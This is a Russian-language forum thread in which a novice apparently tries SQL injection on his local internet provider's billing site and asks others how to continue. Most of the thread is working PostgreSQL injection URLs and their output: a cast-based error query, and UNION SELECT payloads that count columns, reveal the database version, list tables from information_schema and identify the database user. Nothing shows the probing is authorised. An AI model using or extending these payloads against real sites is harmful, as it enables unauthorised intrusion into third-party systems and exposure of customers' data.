В общем по сабжу. В инъекциях практически 0. Лазил по сайту своего городского прова. В общем подставлял везде пробовал кавычки и т.д. (думал изучить как-раз для себя эту неизведанную степь -) ) И в 1 из результатов (http://site.com/BOSSclient/view_ctime.php3?Id=155348' ) Выдало такое: Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в конце ввода LINE 1: SELECT single FROM sdesc WHERE idservice= ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23 Warning: pg_result(): supplied argument is not a valid PostgreSQL result resource in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 24 Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: ошибка синтаксиса в или рядом "AND" LINE 1: ...T oid,* FROM ctime WHERE Id=155348 AND idservice= AND cdate>... ^ in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32 Как это дело раскрутить. Погуглил, пробовал многими способами, которые нашел, но ошибки не меняются. Выдает только это.(Хотя может что-то и не так делал, т.к. в этом деле полный 0 ) Подскажите , куда копать , буду очень благодарен. http://site.com/******/****_*****.php3?Id=155348' уязвимый урл .
shell_c0de, спасибо большое! Натыкался на эту статью, попробовал несколько моментов, но что-то не пошло. Буду копать глубже в этом направлении. Вот допустим пишу по примеру так : http://site.com/BOSSclient/view_ctime.php3?Id=155348+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)-- Выдает ту же ошибку (страница не меняется). Перепробовал почти все с этой статьи. Ничего не меняется -( Кто что может посоветовать.
В общем определил вывод и узнал кол-во столбцов, получилось так: http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207&isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,111,null,null,null-- Затем пробую узнать таблицу так: http://site.com/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120207&isrv=6&id=155348&idservice=-1+union+select+null,null,null,null,TABLE_NAME,null,null,null+from+information_schema.tables-- Выдает такие ошибки на странице : Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: каждый запрос UNION должен иметь одинаковое число колонок in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 23 И снизу: Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: UNION типы double precision и character varying не совпадают in /usr/local/BOSS/httpd/htdocs/BOSSclient/view_ctime.php3 on line 32 Как быть дальше, не знаю. Помогите плиз!...) Буду очень благодарен.
Вот еще методом проб и ошибок-) http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215&isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(version()+as+double+precision),null,null,null-- Выдает нам версию - PostgreSQL 8.2.13 on amd64-portbld-freebsd7.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD] http://ххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215&isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(TABLE_NAME+as+double+precision),null,null,null+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1-- Выдает нам имя таблицы 1 - "views" . Далее, наращивая OFFSET выдает эту же таблицу (хотя таблиц точнодольше должно быть!) http://хххххххххх/BOSSclient/view_ctime.php3?Id=155348&tm=20120201&tm2=20120215&isrv=84&id=155348&idservice=-1+union+select+null,null,null,null,cast(cast(user+as+text)+as+double+precision),null,null,null+from+INFORMATION_SCHEMA.TABLES+LIMIT+1+OFFSET+1-- Так узнаем свои права (по ходу дела, как я понял -) ) - "nobody" Т.е. прав нет считай? Подскажите, что можно сделать в данном случае...